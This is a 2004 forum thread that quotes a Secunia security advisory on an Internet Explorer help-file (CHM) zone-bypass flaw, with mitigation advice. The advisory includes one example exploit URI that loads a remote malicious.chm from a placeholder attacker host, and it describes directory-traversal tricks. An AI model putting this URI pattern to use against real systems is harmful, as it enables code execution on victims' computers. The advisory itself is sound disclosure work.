Free Republic
Browse · Search 		News/Activism
Topics · Post Article

To: sigSEGV
Ah, but you don't have that choice when clicking on a .chm file on a local hard drive.
8 posted on 04/08/2004 1:12:50 PM PDT by TechJunkYard
[ Post Reply | Private Reply | To 7 | View Replies ]

To: TechJunkYard
This is the secunia advisory for the same problem:

Secunia Advisory: SA10523
Release Date: 2004-01-02
Last Update: 2004-04-07

http://secunia.com/advisories/10523/

Critical:
Highly critical
Impact: Security Bypass

Where: From remote

Software: Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6

Description:
Variants of the older showHelp() zone bypass vulnerability have been discovered, which potentially can be exploited to compromise a user's system.

Remote and locally installed "CHM" help files can be opened by websites via either the "showHelp()" function or certain URI handlers like "ms-its:" and "mk:@MSITStore:". Remote files can execute code in context of the "Internet" security zone whereas local files may execute code with the privileges of the logged in user.

Normally, it isn't a problem that Internet Explorer allows websites to open locally installed "CHM" files as they are considered trusted.

However, there exists two problems within the handling of "CHM" files:

1) It is possible to treat other local files as "CHM" files by using a special syntax with a double ":" appended to the file name combined with a directory traversal using the "..//" character sequence.

This has been exploited via programs such as WinAmp, Flash Player, XMLHTTP, ADODB stream and others, which allow files with arbitrary content to be placed in known locations.

2) Files, which haven't been installed locally, may still execute arbitrary code in context of the "Local Zone" by referencing a non-existent file.

Example:
ms-its:mhtml:file://C:\does_not_exist.mhtml!http://[malicious_site]//malicious.chm::/evil.html"

The vulnerability can be exploited in Internet Explorer including the latest versions with all patches and service packs installed.

Solution:
Remove the file association for CHM files. However, this will effectively disable Windows Help.

Use another product.

Provided and/or discovered by:
Originally reported by Arman Nayyeri.

Changelog:
2004-03-29: Added more information about variants. Updated "Solution" section and increased criticality.
2004-04-07: Added link to US-CERT vulnerability note.

Other References:
The old Internet Explorer showHelp() function vulnerability (SA8004):
http://secunia.com/advisories/8004/

US-CERT VU#323070:
http://www.kb.cert.org/vuls/id/323070

9 posted on 04/08/2004 1:48:21 PM PDT by Salo (Revenge is for those too weak to hold a grudge.)
[ Post Reply | Private Reply | To 8 | View Replies ]

Free Republic
Browse · Search 		News/Activism
Topics · Post Article

FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson